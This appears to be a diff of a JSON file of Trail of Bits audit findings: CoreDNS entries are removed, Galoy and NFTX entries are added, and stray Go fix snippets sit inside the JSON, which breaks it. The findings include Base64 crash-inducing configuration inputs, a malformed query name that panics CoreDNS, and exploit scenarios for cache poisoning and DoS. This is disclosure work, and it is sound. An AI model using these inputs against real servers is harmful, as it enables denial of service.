Lgpmb3J3YXJkIE5vTWF0Pk69VL0vvVN0ZXJhbENoYXJDbGFzc0FueUNoYXJOb3ROTEEniez6bnlDaGFyQmVnaW5MaW5l RW5kTGluZUJlZ2luVGV4dEVuZFRleHRXb3JkQm91bmRhcnlOb1dvYXRpbmcgc3lzdGVtIDogImV4dCIsICJ4ZnMiLCAi bnRTaW50NjRLaW5kZnMiLiB5IGluZmVycmVkIHRvIGJlIGV4dCBpZiB1bnNwZWNpZmllZCBlIDogaHR0cHM6Di9rdWJl cm5ldGVzaW9kb2NzY29uY2VwdHNzdG9yYWdldm9sdW1lcyMgIiIiIiIiIiIiIiIiJyCFmIWlsZj//4WuhZilr4WY5bCR mPCd Figure 4.2: The Base64-encoded forward configuration file Specifying a configuration file like that shown above would cause CoreDNS to panic when attempting to access the first element of zones : panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/forward.parseStanza(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:97 +0x972 github.com/coredns/coredns/plugin/forward.parseForward(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:81 +0x5e github.com/coredns/coredns/plugin/forward.setup(0xc000440000) /home/ubuntu/audit-coredns/client-code/coredns/plugin/forward/setup.go:22 +0x33 github.com/coredns/caddy.executeDirectives(0xc0000ea800, {0x7ffdf9f6e6ed, 0x36}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc00056a860, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x22394b8, 0xc00024ea80}, 0xc00024ea80, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x22394b8, 0xc00024ea80}, 0xc0000ea800, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x22394b8, 0xc00024ea80}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 4.3: CoreDNS panics when loading the forward configuration. Exploit Scenario An operator of a CoreDNS server misconfigures the forward plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, verify that the zones variable has the correct number of elements before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS.",
"labels": [
"Trail of Bits",
"Severity: Informational",
"Difficulty: High"
]
},
{
"title": "5. Use of deprecated PreferServerCipherSuites field ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
"body": "In the setTLSDefaults function of the tls plugin, the TLS configuration object includes a PreferServerCipherSuites field, which is set to true .
func setTLSDefaults(tls *ctls.Config) { tls.MinVersion = ctls.VersionTLS12 tls.MaxVersion = ctls.VersionTLS13 tls.CipherSuites = [] uint16 { ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305, ctls.TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, ctls.TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384, ctls.TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256, } tls.PreferServerCipherSuites = true } Figure 5.1: plugin/tls/tls.go#L22-L37 In the past, this property controlled whether a TLS connection would use the cipher suites preferred by the server or by the client. However, as of Go 1.17, this field is ignored. According to the Go documentation for crypto/tls , Servers now select the best mutually supported cipher suite based on logic that takes into account inferred client hardware, server hardware, and security. When CoreDNS is built using a recent Go version, the use of this property is redundant and may lead to false assumptions about how cipher suites are negotiated in a connection to a CoreDNS server. Recommendations Short term, add this issue to the internal issue tracker. Additionally, when support for Go versions older than 1.17 is entirely phased out of CoreDNS, remove the assignment to the deprecated PreferServerCipherSuites field.",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: High"
]
},
{
"title": "6. Use of the MD5 hash function to detect Corefile changes ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
"body": "The reload plugin is designed to automatically detect changes to a Corefile and to reload it if necessary. To determine whether a file has changed, the plugin periodically compares the current MD5 hash of the file to the last hash calculated for it ( plugin/reload/reload.go#L81-L107 ). If the values are different, it reloads the Corefile. However, the MD5 hash function's vulnerability to collisions decreases the reliability of this process; if two different files produce the same hash value, the plugin will not detect the difference between them. Exploit Scenario An operator of a CoreDNS server modifies a Corefile, but the MD5 hash of the modified file collides with that of the old file. As a result, the reload plugin does not detect the change. Instead, it continues to use the outdated server configuration without alerting the operator to its use. Recommendations Short term, improve the robustness of the reload plugin by using the SHA-512 hash function instead of MD5.",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: High"
]
},
{
"title": "7. Use of default math/rand seed in grpc and forward plugins' random server-selection policy ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
"body": "The grpc and forward plugins use the random policy for selecting upstream servers. The implementation of this policy in the two plugins is identical and uses the math/rand package from the Go standard library.
func (r *random) List(p []*Proxy) []*Proxy { switch len (p) { case 1 : return p case 2 : if rand.Int()% 2 == 0 { return []*Proxy{p[ 1 ], p[ 0 ]} // swap } return p } perms := rand.Perm( len (p)) rnd := make ([]*Proxy, len (p)) for i, p1 := range perms { rnd[i] = p[p1] } return rnd } Figure 7.1: plugin/grpc/policy.go#L19-L37 As highlighted in figure 7.1, the random policy uses either rand.Int or rand.Perm to choose the order of the upstream servers, depending on the number of servers that have been configured. Unless a program using the random policy explicitly calls rand.Seed , the top-level functions rand.Int and rand.Perm behave as if they were seeded with the value 1 , which is the default seed for math/rand . CoreDNS does not call rand.Seed to seed the global state of math/rand . Without this call, the grpc and forward plugins' random selection of upstream servers is likely to be trivially predictable and the same every time CoreDNS is restarted. Exploit Scenario An attacker targets a CoreDNS instance in which the grpc or forward plugin is enabled. The attacker exploits the deterministic selection of upstream servers to overwhelm a specific server, with the goal of causing a DoS condition or performing an attack such as a timing attack. Recommendations Short term, instantiate a rand.Rand type with a unique seed, rather than drawing random numbers from the global math/rand state. CoreDNS takes this approach in several other areas, such as the loop plugin .",
"labels": [
"Trail of Bits",
"Severity: Undetermined",
"Difficulty: Medium"
]
},
{
"title": "8. Cache plugin does not account for hash table collisions ",
"html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf",
"body": "To cache a DNS reply, CoreDNS maps the FNV-1 hash of the query name and type to the content of the reply in a hash table entry. func key(qname string , m *dns.Msg, t response.Type) ( bool , uint64 ) { // We don't store truncated responses. if m.Truncated { return false , 0 } // Nor errors or Meta or Update. if t == response.OtherError || t == response.Meta || t == response.Update { return false , 0 } return true , hash(qname, m.Question[ 0 ].Qtype) } func hash(qname string , qtype uint16 ) uint64 { h := fnv.New64() h.Write([] byte { byte (qtype >> 8 )}) h.Write([] byte { byte (qtype)}) h.Write([] byte (qname)) return h.Sum64() } Figure 8.1: plugin/cache/cache.go#L68-L87 To check whether there is a cached reply for an incoming query, CoreDNS performs a hash table lookup for the query name and type. If it identifies a reply with a valid time to live (TTL), it returns the reply. CoreDNS assumes the stored DNS reply to be the correct one for the query, given the use of a hash table mapping. However, this assumption is faulty, as FNV-1 is a non-cryptographic hash function that does not offer collision resistance, and there exist utilities for generating colliding inputs to FNV-1 . As a result, it is likely possible to construct a valid (qname , qtype) pair that collides with another one, in which case CoreDNS could serve the incorrect cached reply to a client. Exploit Scenario An attacker aiming to poison the cache of a CoreDNS server generates a valid (qname* , qtype*) pair whose FNV-1 hash collides with a commonly queried (qname , qtype) pair. The attacker gains control of the authoritative name server for qname* and points its qtype* record to an address of his or her choosing.
The attacker also configures the server to send a second record when (qname* , qtype*) is queried: a qtype record for qname that points to a malicious address. The attacker queries the CoreDNS server for (qname* , qtype*) , and the server caches the reply with the malicious address. Soon thereafter, when a legitimate user queries the server for (qname , qtype) , CoreDNS serves the user the cached reply for (qname* , qtype*) , since it has an identical FNV-1 hash. As a result, the legitimate user's DNS client sees the malicious address as the record for qname . Recommendations Short term, store the original name and type of a query in the value of a hash table entry. After looking up the key for an incoming request in the hash table, verify that the query name and type recorded alongside the cached reply match those of the request. If they do not, disregard the cached reply. Short term, use the keyed hash function SipHash instead of FNV-1. SipHash was designed for speed and derives a 64-bit output value from an input value and a 128-bit secret key; this method adds pseudorandomness to a hash table key and makes it more difficult for an attacker to generate collisions offline. CoreDNS should use the crypto/rand package from Go's standard library to generate a cryptographically random secret key for SipHash on startup.", - "labels": [ - "Trail of Bits", - "Severity: High", - "Difficulty: Medium" - ] - }, - { - "title": "9. Index-out-of-range reference in kubernetes plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The parseRequest function of the kubernetes plugin parses a DNS request before using it to query Kubernetes. By fuzzing the function, we discovered an out-of-range issue that can cause a panic. The issue occurs when the function calls stripUnderscore with an empty string, as it does when it receives a request with the qname .o.o.po.pod.8 and the zone interwebs. // stripUnderscore removes a prefixed underscore from s. func stripUnderscore(s string ) string { if s[ 0 ] != '_' { return s } return s[ 1 :] } Figure 9.1: plugin/kubernetes/parse.go#L97 Because of the time constraints of the audit, we could not find a way to directly exploit this vulnerability. Although certain tools for sending DNS queries, like dig and host , verify the validity of a host before submitting a DNS query, it may be possible to exploit the vulnerability by using custom tooling or DNS over HTTPS (DoH). Exploit Scenario An attacker finds a way to submit a query with an invalid host (such as o.o.po.pod.8) to a CoreDNS server running as the DNS server for a Kubernetes endpoint. Because of the index-out-of-range bug, the kubernetes plugin causes CoreDNS to panic and crash, resulting in a DoS. Recommendations Short term, to prevent a panic, implement a check of the value of the string passed to the stripUnderscore function.", - "labels": [ - "Trail of Bits", - "Severity: High", - "Difficulty: Medium" - ] - }, - { - "title": "10. Calls to time.After() in select statements can lead to memory leaks ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Calls to the time.After function in select/case statements within for loops can lead to memory leaks. This is because the garbage collector does not clean up the underlying Timer object until the timer has fired. A new timer is initialized at the start of each iteration of the for loop (and therefore with each select statement), which requires resources.
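For finding 9 above, a guarded variant of the stripUnderscore function from figure 9.1, reflecting the short-term recommendation; the length check is the only change we add:

```go
// stripUnderscore removes a prefixed underscore from s. Checking the
// length first prevents the index-out-of-range panic on an empty
// string described in finding 9.
func stripUnderscore(s string) string {
	if len(s) == 0 || s[0] != '_' {
		return s
	}
	return s[1:]
}
```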
As a result, if many routines originate from a time.After call, the system may experience memory overconsumption. for { select { case <-ctx.Done(): log.Debugf( \"Breaking out of CloudDNS update loop for %v: %v\" , h.zoneNames, ctx.Err()) return case <-time.After( 1 * time.Minute) : if err := h.updateZones(ctx); err != nil && ctx.Err() == nil /* Don't log error if ctx expired. */ { log.Errorf( \"Failed to update zones %v: %v\" , h.zoneNames, err) } Figure 10.1: A time.After() routine that causes a memory leak ( plugin/clouddns/clouddns.go#L85-L93 ) The following portions of the code contain similar patterns: plugin/clouddns/clouddns.go#L85-L93 plugin/azure/azure.go#L87-96 plugin/route53/route53.go#87-96 Exploit Scenario An attacker finds a way to overuse a function, which leads to overconsumption of a CoreDNS server's memory and a crash. Recommendations Short term, use a ticker instead of the time.After function in select/case statements included in for loops. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, avoid using the time.After method in for-select routines and periodically use a Semgrep query to detect similar patterns in the code. References DevelopPaper post on the memory leak vulnerability in time.After Golang <-time.After() Is Not Garbage Collected before Expiry (Medium post)", + { + "title": "20. Third-party container images are not version pinned ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The continuous integration (CI) pipeline and Helm charts reference third-party components such as Docker registry images by named tags (or by no tag at all). Registry tags are not immutable; if an attacker compromised an image publisher's account, the pipeline or Kubernetes cluster could be provided a malicious container image. 87 - name : build-chain-dl-image 88 89 90 91 92 93 94 95 96 97 98 serial : true plan : - { get : chain-dl-image-def , trigger : true } - task : build privileged : true config : platform : linux image_resource : type : registry-image source : repository : vito/oci-build-task Figure 20.1: A third-party image referenced without an explicit tag ( ci/pipeline.yml#87-98 ) 270 resource_types : 271 - name : terraform 272 273 274 275 type : docker-image source : repository : ljfranklin/terraform-resource tag : latest Figure 20.2: An image referenced by the latest tag ( ci/pipeline.yml#270-275 ) Exploit Scenario An attacker gains access to a Docker Hub account hosting an image used in the CI pipeline. The attacker then tags a malicious container image and pushes it to Docker Hub. The CI pipeline retrieves the tagged malicious image and uses it to execute tasks. Recommendations Short term, refer to Docker images by SHA-256 digests to prevent the use of an incorrect or modified image. Long term, integrate automated tools such as Checkov into the development workflow to detect similar issues in the codebase.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "11. Incomplete list of debugging data exposed by the prometheus plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Enabling the prometheus (metrics) plugin exposes an HTTP endpoint that lists CoreDNS metrics. The documentation for the plugin indicates that it reports data such as the total number of queries and the size of responses.
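Illustrating the ticker-based pattern recommended for finding 10: a single Timer is allocated for the lifetime of the loop and stopped deterministically, instead of one Timer per iteration. The function name and update callback below are illustrative assumptions, not CoreDNS code:

```go
package main

import (
	"context"
	"log"
	"time"
)

// runUpdateLoop replaces `case <-time.After(1 * time.Minute)` with a
// single reusable ticker, avoiding the per-iteration Timer
// allocations described in finding 10. updateZones stands in for the
// real update callback.
func runUpdateLoop(ctx context.Context, updateZones func(context.Context) error) {
	ticker := time.NewTicker(1 * time.Minute)
	defer ticker.Stop() // release the ticker when the loop exits
	for {
		select {
		case <-ctx.Done():
			return
		case <-ticker.C:
			if err := updateZones(ctx); err != nil && ctx.Err() == nil {
				log.Printf("failed to update zones: %v", err)
			}
		}
	}
}

func main() {
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Minute)
	defer cancel()
	runUpdateLoop(ctx, func(context.Context) error { return nil })
}
```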
However, other data that is reported by the plugin (and also available through the pprof plugin) is not listed in the documentation. This includes Go runtime debugging information such as the number of running goroutines and the duration of Go garbage collection runs. Because this data is not listed in the prometheus plugin documentation, operators may initially be unaware of its exposure. Moreover, the data could be instrumental in formulating an attack. # TYPE go_gc_duration_seconds summary go_gc_duration_seconds{quantile=\"0\"} 4.4756e-05 go_gc_duration_seconds{quantile=\"0.25\"} 6.0522e-05 go_gc_duration_seconds{quantile=\"0.5\"} 7.1476e-05 go_gc_duration_seconds{quantile=\"0.75\"} 0.000105802 go_gc_duration_seconds{quantile=\"1\"} 0.000205775 go_gc_duration_seconds_sum 0.010425592 go_gc_duration_seconds_count 123 # HELP go_goroutines Number of goroutines that currently exist. # TYPE go_goroutines gauge go_goroutines 18 # HELP go_info Information about the Go environment. # TYPE go_info gauge go_info{version=\"go1.17.3\"} 1 # HELP go_memstats_alloc_bytes Number of bytes allocated and still in use. # TYPE go_memstats_alloc_bytes gauge Figure 11.1: Examples of the data exposed by prometheus and omitted from the documentation Exploit Scenario An attacker discovers the metrics exposed by CoreDNS over port 9253. The attacker then monitors the endpoint to determine the effectiveness of various attacks in crashing the server. Recommendations Short term, document all data exposed by the prometheus plugin. Additionally, consider changing the data exposed by the prometheus plugin to exclude Go runtime data available through the pprof plugin.", + "title": "21. Compute instances do not leverage Shielded VM features ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The bastion host definition does not enable all of Google Cloud's Shielded VM (virtual machine) features for Compute Engine VM instances. These features provide verifiable integrity of VM instances and assurance that VM instances have not been compromised by boot- or kernel-level malware or rootkits. Three features provide this verifiable integrity: Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring. Google also offers Shielded GKE nodes, which are built on top of Shielded VMs and provide strong verifiable node identity and integrity to increase the security of GKE nodes. The node pool definition does enable this feature but disables Secure Boot checks on the node instances. 168 169 170 shielded_instance_config { enable_secure_boot = false enable_integrity_monitoring = true 171 } Figure 21.1: Secure Boot is disabled. ( modules/platform/gcp/kube.tf#168-171 ) Exploit Scenario The bastion host is compromised, and persistent kernel-level malware is installed. Because the bastion host is still operational, the malware remains undetected for an extended period. Recommendations Short term, enable these security features to increase the security and trustworthiness of the infrastructure. Long term, integrate automated analysis tools such as tfsec into the development workflow to detect other areas of improvement in the solution. References What is Shielded VM? , Compute Engine documentation Using GKE Shielded Nodes, GKE documentation", "labels": [ "Trail of Bits", "Severity: Informational", @@ -3122,79 +5800,79 @@ ] }, { - "title": "12. 
Cloud integrations require cleartext storage of keys in the Corefile ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The route53 , azure , and clouddns plugins enable CoreDNS to interact with cloud providers (AWS, Azure, and the Google Cloud Platform (GCP), respectively). To access clouddns , a user enters the path to the file containing his or her GCP credentials. When using route53 , CoreDNS pulls the AWS credentials that the user has entered in the Corefile. If the AWS credentials are not included in the Corefile, CoreDNS will pull them in the same way that the AWS command-line interface (CLI) would. While operators have options for the way that they provide AWS and GCP credentials, Azure credentials must be pulled directly from the Corefile. Furthermore, the CoreDNS documentation lacks guidance on the risks of storing AWS, Azure, or GCP credentials in local configuration files . Exploit Scenario An attacker or malicious internal user gains access to a server running CoreDNS. The malicious actor then locates the Corefile and obtains credentials for a cloud provider, thereby gaining access to a cloud infrastructure. Recommendations Short term, remove support for entering cloud provider credentials in the Corefile in cleartext. Instead, load credentials for each provider in the manner recommended in that provider's documentation and implemented by its CLI utility. CoreDNS should also refuse to load credential files with overly broad permissions and warn users about the risks of such files.", + "title": "22. Excessive container permissions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "Kubernetes containers launch processes under user and group IDs corresponding to users and groups on the host system. Container processes that are running as root usually have more permissions than their workload requires. If such a process were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, such as disabling the allowPrivilegeEscalation flag to ensure that a child process of a container cannot gain more privileges than its parent, dropping all Linux capabilities, and enforcing Seccomp and AppArmor profiles. We found several instances of containers run as root, with allowPrivilegeEscalation enabled by omission (figure 22.1) or with low user IDs that overlap with host user IDs (figure 22.2). In some of the containers, Linux capabilities were not dropped (figure 22.2), and neither Seccomp nor AppArmor profiles were enabled. 24 containers : 25 - name : auth-backend 26 27 28 29 30 image : \"{{ .Values.image.repository }}@{{ .Values.image.digest }}\" ports : - containerPort : 3000 env : - (...) Figure 22.1: Without a securityContext field, commands will run as root and a container will allow privilege escalation by default. ( charts/galoy-auth/charts/auth-backend/templates/deployment.yaml#24-30 ) 38 39 40 41 42 43 44 45 securityContext : # capabilities: # drop: # - ALL readOnlyRootFilesystem : true runAsNonRoot : true runAsUser : 1000 runAsGroup : 3000 Figure 22.2: User ID 1000 is typically used by the first non-system user account. ( charts/bitcoind/values.yaml#38-45 ) Exploit Scenario An attacker is able to trigger remote code execution in the Web Wallet application. 
The attacker then leverages the lax permissions to exploit CVE-2022-0185, a buffer overflow vulnerability in the Linux kernel that allows her to obtain root privileges and escape the Kubernetes pod. The attacker then gains the ability to execute code on the host system. Recommendations Short term, review and adjust the securityContext configuration of all charts used by the Galoy system. Run pods as non-root users with high user IDs that will not overlap with host user IDs. Drop all unnecessary capabilities, and enable security policy enforcement when possible. Long term, integrate automated tools such as Checkov into the CI pipeline to detect areas of improvement in the solution. Additionally, review the Docker recommendations outlined in appendix E . References Kubernetes container escape using Linux Kernel exploit , CrowdStrike 10 Kubernetes Security Context settings you should understand, snyk", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { - "title": "13. Lack of rate-limiting controls ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "CoreDNS does not enforce rate limiting of DNS queries, including those sent via DoH. As a result, we were able to issue the same request thousands of times in less than one minute over the HTTP endpoint /dns-query . Figure 13.1: We sent 3,424 requests to CoreDNS without being rate limited. During our tests, the lack of rate limiting did not appear to affect the application. However, processing requests sent at such a high rate can consume an inordinate amount of host resources, and a lack of rate limiting can facilitate DoS and DNS amplification attacks. Exploit Scenario An attacker floods a CoreDNS server with HTTP requests, leading to a DoS condition. Recommendations Short term, consider incorporating the rrl plugin, used for the rate limiting of DNS queries, into the CoreDNS codebase. Additionally, implement rate limiting on all API endpoints. An upper bound can be applied at a high level to all endpoints exposed by CoreDNS. Long term, run stress tests to ensure that the rate limiting enforced by CoreDNS is robust.", + "title": "23. Unsigned and unversioned Grafana BigQuery Datasource plugin ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", + "body": "The BigQuery Datasource plugin is installed as part of the Grafana configuration found in the Helm charts. The plugin, which is unsigned, is pulled directly from the master branch of the doitintl/bigquery-grafana GitHub repository, and signature checks for the plugin are disabled. Grafana advises against running unsigned plugins. 10 11 plugins : - https://github.com/doitintl/bigquery-grafana/archive/master.zip ;doit-bigquery-dataso urce 12 13 14 15 grafana.ini : plugins : allow_loading_unsigned_plugins : \"doitintl-bigquery-datasource\" Figure 23.1: The plugin is downloaded directly from the GitHub repository, and signature checks are disabled. ( charts/monitoring/values.yaml#10-15 ) Exploit Scenario An attacker compromises the doitintl/bigquery-grafana repository and pushes malicious code to the master branch. When Grafana is set up, it downloads the plugin code from the master branch. Because unsigned plugins are allowed, Grafana directly loads the malicious plugin. Recommendations Short term, install the BigQuery Datasource plugin from a signed source such as the Grafana catalog, and disallow the loading of any unsigned plugins. 
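For finding 13 above, one way to apply an upper bound across HTTP endpoints, sketched with golang.org/x/time/rate; the rate, burst, port, and handler here are arbitrary examples (the rrl plugin mentioned in the recommendation remains the DNS-specific option):

```go
package main

import (
	"net/http"

	"golang.org/x/time/rate"
)

// limit wraps an http.Handler and rejects requests once the shared
// token bucket is exhausted. 100 req/s with a burst of 200 is an
// illustrative value, not a CoreDNS default.
func limit(next http.Handler) http.Handler {
	limiter := rate.NewLimiter(rate.Limit(100), 200)
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !limiter.Allow() {
			http.Error(w, "too many requests", http.StatusTooManyRequests)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	mux := http.NewServeMux()
	mux.HandleFunc("/dns-query", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("ok")) // placeholder handler for the sketch
	})
	http.ListenAndServe(":8053", limit(mux))
}
```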
Long term, review the vendor recommendations when configuring new software and avoid disabling security features such as signature checks. When referencing external code and software releases, do so by immutable hash digests instead of named tags or branches to prevent unintended modifications. References Plugin Signatures , Grafana Labs 24. Insufficient validation of JWTs used for GraphQL subscriptions Severity: Low Difficulty: Low Type: Authentication Finding ID: TOB-GALOY-24 Target: galoy/src/servers/graphql-server.ts", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "14. Lack of a limit on the size of response bodies ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "The ioutil.ReadAll function reads from a source input until encountering an error or the end of the file, at which point it returns the data that it read. The toMsg function, which processes requests for the HTTP server, uses ioutil.ReadAll to parse requests and to read POST bodies. However, there is no limit on the size of request bodies. Using ioutil.ReadAll to parse a large request that is loaded multiple times may exhaust the system's memory, causing a DoS. func toMsg(r io.ReadCloser) (*dns.Msg, error ) { buf, err := io.ReadAll(r) if err != nil { return nil , err } m := new (dns.Msg) err = m.Unpack(buf) return m, err } Figure 14.1: plugin/pkg/doh/doh.go#L94-L102 Exploit Scenario An attacker generates multiple POST requests with long request bodies to /dns-query , leading to the exhaustion of its resources. Recommendations Short term, use the io.LimitReader function or another mechanism to limit the size of request bodies. Long term, consider implementing application-wide limits on the size of request bodies to prevent DoS attacks.", + "title": "1. Reliance on third-party library for deployment ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", + "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that offers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. 
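For finding 14 above, a bounded variant of the toMsg function from figure 14.1 using io.LimitReader, as the short-term recommendation suggests; the 64 KiB cap is an example value we chose, not one from the CoreDNS codebase:

```go
package main

import (
	"errors"
	"io"

	"github.com/miekg/dns"
)

// maxBodySize caps how much of a DoH POST body is read; 64 KiB is an
// illustrative limit, not a CoreDNS default.
const maxBodySize = 64 * 1024

// toMsg reads at most maxBodySize+1 bytes so that oversized bodies
// are detected and rejected instead of exhausting memory.
func toMsg(r io.ReadCloser) (*dns.Msg, error) {
	buf, err := io.ReadAll(io.LimitReader(r, maxBodySize+1))
	if err != nil {
		return nil, err
	}
	if len(buf) > maxBodySize {
		return nil, errors.New("request body too large")
	}
	m := new(dns.Msg)
	err = m.Unpack(buf)
	return m, err
}

func main() {}
```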
Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eve's control over the contract. Recommendations Short term, document the protocol's use of the library and the proxy types it supports. Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "15. Index-out-of-range panic in grpc plugin initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/CoreDNS.pdf", - "body": "Initializing the grpc plugin involves parsing the relevant configuration section. func parseStanza(c *caddy.Controller) (*GRPC, error ) { g := newGRPC() if !c.Args(&g.from) { return g, c.ArgErr() } g.from = plugin.Host(g.from).NormalizeExact()[ 0 ] // only the first is used. Figure 15.1: plugin/grpc/setup.go#L53-L59 An invalid configuration file for the grpc plugin could cause the call to NormalizeExact (highlighted in figure 15.1) to return a value with zero elements. A Base64-encoded example of such a configuration file is shown below. MApncnBjIDAwMDAwMDAwMDAwhK2FhYKtMIStMITY2NnY2dnY7w== Figure 15.2: The Base64-encoded grpc configuration file Specifying a configuration file like that in figure 15.2 would cause CoreDNS to panic when attempting to access the first element of the return value. panic: runtime error: index out of range [0] with length 0 goroutine 1 [running]: github.com/coredns/coredns/plugin/grpc.parseStanza(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:59 +0x31b github.com/coredns/coredns/plugin/grpc.parseGRPC(0xc0002f0900) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:45 +0x5e github.com/coredns/coredns/plugin/grpc.setup(0x1e4dcc0) /home/ubuntu/audit-coredns/client-code/coredns/plugin/grpc/setup.go:17 +0x30 github.com/coredns/caddy.executeDirectives(0xc0000e2900, {0x7ffc15b696e0, 0x31}, {0x324cfa0, 0x31, 0x1000000004b7e06}, {0xc000269300, 0x1, 0x8}, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:661 +0x5f6 github.com/coredns/caddy.ValidateAndExecuteDirectives({0x2239518, 0xc0002b2980}, 0xc0002b2980, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:612 +0x3e5 github.com/coredns/caddy.startWithListenerFds({0x2239518, 0xc0002b2980}, 0xc0000e2900, 0x0) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:515 +0x274 github.com/coredns/caddy.Start({0x2239518, 0xc0002b2980}) /home/ubuntu/go/pkg/mod/github.com/coredns/caddy@v1.1.1/caddy.go:472 +0xe5 github.com/coredns/coredns/coremain.Run() /home/ubuntu/audit-coredns/client-code/coredns/coremain/run.go:62 +0x1cd main.main() /home/ubuntu/audit-coredns/client-code/coredns/coredns.go:12 +0x17 Figure 15.3: CoreDNS panics when loading the grpc configuration. Exploit Scenario An operator of a CoreDNS server misconfigures the grpc plugin, causing a panic. Because CoreDNS does not provide a clear explanation of what went wrong, it is difficult for the operator to troubleshoot and fix the issue. Recommendations Short term, verify that the variable returned by NormalizeExact has at least one element before indexing it. Long term, review the codebase for instances in which data is indexed without undergoing a length check; handling untrusted data in this way may lead to a more severe DoS. A. 
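For finding 15 above, a sketch of the recommended guard around the call shown in figure 15.1; it assumes the surrounding parseStanza context from that figure, and the error message is illustrative:

```go
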